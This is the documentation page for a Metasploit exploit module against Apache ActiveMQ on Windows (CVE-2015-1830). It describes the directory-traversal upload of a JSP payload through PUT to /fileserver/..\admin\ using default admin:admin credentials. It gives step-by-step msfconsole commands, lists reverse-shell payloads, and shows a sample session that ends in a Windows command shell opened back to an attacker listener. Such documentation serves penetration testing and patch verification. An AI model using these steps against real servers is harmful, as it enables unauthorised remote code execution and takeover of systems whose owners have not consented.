kalba-security
4.1 KiB
Introduction
A directory traversal vulnerability was discovered in the fileserver upload/download functionality for blob messages in Apache ActiveMQ 5.x before 5.11.2 for Windows. The vulnerability, tracked as CVE-2015-1830, allows remote attackers to create JSP files in arbitrary directories via unspecified vectors.
Because vulnerable servers allow for directory traversal, they will accept HTTP PUT requests for /fileserver/..\\admin\\ and process these as requests for /admin/. For the PUT request to succeed, credentials need to be provided.
This module exploits CVE-2015-1830 by attempting to upload a JSP payload to a target via an HTTP PUT requests for /fileserver/..\\admin\\ using the default credentials admin:admin (or any other credentials provided by the user). It then issues an HTTP GET request to /admin/<payload>.jsp on the target in order to trigger the payload and obtain a shell. The module has been succesfully tested against ActiveMQ 5.11.1 on a Windows 7 machine.
Verification Steps
- Install the module as usual
- Start msfconsole
- Do:
use exploit/windows/http/apache_activemq_traversal_upload - Do:
set RHOSTS [IP] - Do:
set payload [payload] - Do:
set LHOST [IP] - Do:
exploit
Options
PASSWORD. The default setting isadmin.PATH. This option is the traversal path./fileserver/..\admin\by default.Proxies. This option is not set by default.RHOSTS. To use:set RHOSTS [IP]RPORT. The default setting is8161. To use:set RPORT [PORT]SSL. The default setting isfalse.THREADS. The default setting is1.USERNAME. The default setting isadmin.VHOST. This option is not set by default.TARGETURI. This option is the base path./by default.
Compatible Payloads
generic/customgeneric/shell_bind_tcpgeneric/shell_reverse_tcpjava/jsp_shell_bind_tcpjava/jsp_shell_reverse_tcp
Payload Options
LHOST. To use:set LHOST [IP]LPORT. The default setting is4444. To use:set LPORT [PORT]SHELL. This option is not set by default.
Scenarios
msf5 exploit(windows/http/apache_activemq_traversal_upload) > show options
Module options (exploit/windows/http/apache_activemq_traversal_upload):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD admin yes Password to authenticate with
PATH /fileserver/..\admin\ yes Traversal path
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.1.2 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 8161 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the web application
USERNAME admin yes Username to authenticate with
VHOST no HTTP server virtual host
Payload options (java/jsp_shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.1.1 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
SHELL no The system shell to use.
msf5 exploit(windows/http/apache_activemq_traversal_upload) > exploit
[*] Started reverse TCP handler on 192.168.1.1:4444
[*] Uploading payload...
[*] Payload sent. Attempting to execute the payload.
[*] Payload executed!
[*] Command shell session 1 opened (192.168.1.1:4444 -> 192.168.1.2:49194) at 2020-02-04 10:55:36 +0100
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\IEUser\Desktop\activemq 5.11.1\apache-activemq-5.11.1\bin\win64>